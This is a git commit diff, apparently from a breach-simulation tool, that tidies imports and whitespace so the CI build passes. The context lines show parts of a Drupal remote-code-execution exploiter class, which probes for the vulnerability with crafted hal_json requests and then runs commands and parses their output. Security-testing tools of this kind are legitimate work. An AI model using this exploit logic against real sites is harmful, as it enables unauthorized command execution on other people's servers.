Update minor things in order to pass CI build

This commit is contained in:
Shay Nehmad 2020-09-01 11:48:06 +03:00
parent e7ecaa1744
commit cec57c1604
2 changed files with 15 additions and 12 deletions

View File

@ -1,6 +1,7 @@
from unittest import TestCase
from common.network.network_utils import get_host_from_network_location, remove_port
from common.network.network_utils import (get_host_from_network_location,
remove_port)
class TestNetworkUtils(TestCase):

View File

@ -5,11 +5,13 @@ Implementation is based on:
"""
import logging
import requests
from urllib.parse import urljoin
import requests
from common.network.network_utils import remove_port
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import ID_STRING
from network.network_utils import remove_port
__author__ = 'Ophir Harpaz'
@ -102,15 +104,15 @@ class DrupalExploiter(WebRCE):
"value": ""
}
}
response = requests.get(f'{url}?_format=hal_json',
json=payload,
headers={"Content-Type": "application/hal+json"})
if check_drupal_cache(response):
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
return False
return 'INVALID_VALUE does not correspond to an entity on this site' in response.text
def exploit(self, url, command):
@ -138,21 +140,21 @@ class DrupalExploiter(WebRCE):
}
}
}
LOG.info(payload)
r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
if check_drupal_cache(r):
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
if ID_STRING not in r.text:
LOG.warning('Command execution _may_ have failed')
result = r.text.split(ID_STRING)[-1]
LOG.info(f'Drupal exploit result = {result}')
return result
def get_target_url(self):
"""
We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL.